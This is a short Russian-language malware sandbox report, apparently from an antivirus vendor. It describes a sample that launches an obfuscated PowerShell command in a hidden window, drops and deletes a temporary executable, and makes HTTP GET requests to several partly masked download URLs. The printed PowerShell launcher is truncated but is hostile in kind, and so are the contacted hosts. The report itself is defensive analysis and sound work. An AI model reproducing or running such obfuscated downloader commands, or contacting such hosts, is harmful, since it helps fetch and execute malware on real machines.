Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " $(Set-ITEM 'vaRiAbLE:Ofs' '' ) " +[sTRing]('21}112}80t82e93K105v17N12N17Z95K84>70Z28>94}83v91v84v82>69N17w67K80!95N85N94t92}10!21!70}125>127}71N107N17e12>17t95v84w70N28N94K83Z91!84t82e69!17>...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\689536.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Удаляет следующие файлы
- %TEMP%\689536.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ba####carpet.com/Z9ovqtq/
- http://ga####e-lidia.ru/Fr4CcU/
- http://ar##ard.me/bIPadE/
- http://www.ar##ard.me/bIPadE/
- http://av###n.pro:443/Ml8GR via av##in.pro
- http://www.ke######koltukyikama.net/Gt9oFv/
- http://ke######koltukyikama.net/Gt9oFv/
UDP
- DNS ASK ba####carpet.com
- DNS ASK ga####e-lidia.ru
- DNS ASK ar##ard.me
- DNS ASK av##in.pro
- DNS ASK ke######koltukyikama.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " $(Set-ITEM 'vaRiAbLE:Ofs' '' ) " +[sTRing]('21}112}80t82e93K105v17N12N17Z95K84>70Z28>94}83v91v84v82>69N17w67K80!95N85N94t92}10!21!70}125>127}71N107N17e12>17t95v84w70N28N94K83Z91!84t82e69!17>...' (со скрытым окном)
